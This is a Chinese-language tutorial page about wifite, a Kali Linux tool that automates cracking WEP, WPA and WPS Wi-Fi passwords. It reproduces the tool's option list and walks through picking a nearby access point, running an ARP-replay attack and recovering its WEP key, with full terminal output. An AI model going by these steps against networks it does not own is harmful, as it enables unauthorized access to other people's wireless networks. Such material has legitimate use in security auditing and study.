网站首页 > 开源技术 正文
一、工具简介
wifite是一款自动化无线wep、wpa密码获取工具,不支持windows和osx。wifite的特点是可以同时操作多个采用wep和wpa加密的网络。wifite只需简单的配置即可自动化运行,期间无需人工干预。
工具特点:
- 通过信号强度(dB)对目标进行排序; 首先获取最近的接入点
- 自动取消身份验证隐藏网络的客户端以显示SSID
- 许多过滤器可以准确地指定要攻击的内容(wep/wpa/both, above certain signal strengths, channels, etc)
- 可定制设置(timeouts, packets/sec, etc)
- “匿名”功能; 操作前将MAC更改为随机地址,然后在攻击完成后更改
- 所有捕获的WPA握手都备份到wifite.py的当前目录
- 智能WPA去认证; 所有客户端和广播呼叫之间的循环
- 停止任何攻击与Ctrl + C,选项继续,移动到下一个目标,跳到获取或退出
- 退出时显示会议摘要; 显示任何获取的密钥
- 所有密码保存到cracked.txt
二、wifite工具包
root@kali:~# wifite -h
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for Linux
':. /_____\ ,:'
/ \
命令
-check <file> 检查capfile <文件>进行握手。
-cracked 显示以前已获取的接入点
GLOBAL
-all 攻击所有目标. [off]
-i <iface> 用于捕获的无线接口 [auto]
-mac 匿名mac地址 [off]
-c <channel> 频道扫描目标 [auto]
-e <essid> 通过ssid定位特定的接入点 (name) [ask]
-b <bssid> 通过bssid定位一个特定的接入点 (mac) [auto]
-showb 扫描后显示目标BSSID [off]
-pow <db> 用信号强度攻击任何目标 > db [0]
-quiet 扫描期间不要打印AP列表 [off]
WPA
-wpa 仅针对WPA网络 (works with -wps -wep) [off]
-wpat <sec> 等待WPA攻击完成的时间 (seconds) [500]
-wpadt <sec> 发送deauth数据包之间等待的时间 (sec) [10]
-strip 使用tshark或pyrit进行握手 [off]
-crack <dic> 使用<dic> wordlist文件破解WPA握手 [off]
-dict <file> 指定要在获取WPA时使用的字典 [phpbb.txt]
-aircrack 使用aircrack验证握手 [on]
-pyrit 使用pyrit验证握手 [off]
-tshark 使用tshark验证握手 [on]
-cowpatty 用cowpatty验证握手 [off]
WEP
-wep 只针对WEP网络 [off]
-pps <num> 设置每秒注入的数据包数 [600]
-wept <sec> 秒等待每次攻击,0意味着无休止 [600]
-chopchop 使用chopchop攻击 [on]
-arpreplay 使用arpreplay攻击 [on]
-fragment 使用碎片攻击 [on]
-caffelatte 使用caffe-latte攻击 [on]
-p0841 使用-p0841攻击 [on]
-hirte 使用 hirte (cfrag)攻击 [on]
-nofakeauth 如果假认证失败,则停止攻击 [off]
-wepca <n> 当iv的数量超过n时开始破解 [10000]
-wepsave 将.cap文件的副本保存到此目录 [off]
WPS
-wps 只针对WPS网络 [off]
-wpst <sec> 最大等待新的重试,然后放弃(0: never) [660]
-wpsratio <per> 成功的PIN尝试次数/总尝试次数的最小比例 [0]
-wpsretry <num> 在放弃之前,同一个PIN的最大重试次数 [0]
EXAMPLE
./wifite.py -wps -wep -c 6 -pps 600
[+] quitting
wifite 使用示例
使用WPS操作(-pow 50),操作超过50 dB功率(-wps)的接入点:
root@kali:~# wifite -pow 50 -wps
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for Linux
':. /_____\ ,:'
/ \
[+] targeting WPS-enabled networks
[+] scanning for wireless devices...
[+] enabling monitor mode on wlan0... done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
三、实战wifite自动化获取WEP加密密码
在终端下启动wifite工具:
root@kali:~# wifite
等个几秒就会扫描出附近的wifi
让他先扫描,当CLIENT下面出现client时按”CTRL+C”:他会提示你要你输入编号,这里我就输入”4”,因为4采用的是WEP加密的。
输入之后确定,就会出现以下提示
[+] select target numbers (1-17) separated by commas, or 'all': 4
[+] 1 target selected.
[0:10:00] preparing attack "Tp-Link_F59C20" (14:E6:E4:AC:FB:20)
[0:10:00] attempting fake authentication (5/5)… failed
[0:10:00] attacking "Tp-Link_F59C20" via arp-replay attack
[0:09:06] started cracking (over 10000 ivs)
[0:09:00] captured 12492 ivs @ 418 iv/sec
[0:09:00] cracked Tp-Link_F59C20 (14:E6:E4:AC:FB:20)! key: "12345678"
[+] 1 attack completed:
[+] 1/1 WEP attacks succeeded
cracked Tp-Link_F59C20 (14:E6:E4:AC:FB:20), key: "12345678"
[+] disabling monitor mode on mon0… done
[+] quitting
从以上输出信息中,可以看到获取成功。其中,Tp-Link_F59C20无线接入点的密码是12345678。
猜你喜欢
- 2024-09-11 超实用!手把手教你如何3步进行Web渗透测试!
- 2024-09-11 组一个NVME固态硬盘为核心的NAS-威联通TS264C开箱与使用
- 2024-09-11 网络漫画《XKCD》遭黑客入侵,盗取56万账号?
- 2024-09-11 XAMPP:轻松搭建你的Apache世界(xampp搭建网站)
- 2024-09-11 网络安全关于php+Mysql注入的误区
- 2024-09-11 2016年到2017年的网站优化趋势(2014年网站数量减少的原因)
- 2024-09-11 760万“塞勒姆小镇”玩家个人信息惨遭泄露
- 2024-09-11 10大最受欢迎的Plesk插件(plexus插件如何使用)
- 2024-09-11 高级PHP应用程序漏洞审核技术(高级php应用程序漏洞审核技术实验报告)
- 2024-09-11 Linux系统之linux命令大全与基本常识基础教程丨致臻数据
你 发表评论:
欢迎- 最近发表
- 标签列表
-
- jdk (81)
- putty (66)
- rufus (78)
- 内网穿透 (89)
- okhttp (70)
- powertoys (74)
- windowsterminal (81)
- netcat (65)
- ghostscript (65)
- veracrypt (65)
- asp.netcore (70)
- wrk (67)
- aspose.words (80)
- itk (80)
- ajaxfileupload.js (66)
- sqlhelper (67)
- express.js (67)
- phpmailer (67)
- xjar (70)
- redisclient (78)
- wakeonlan (66)
- tinygo (85)
- startbbs (72)
- webftp (82)
- vsvim (79)
本文暂时没有评论,来添加一个吧(●'◡'●)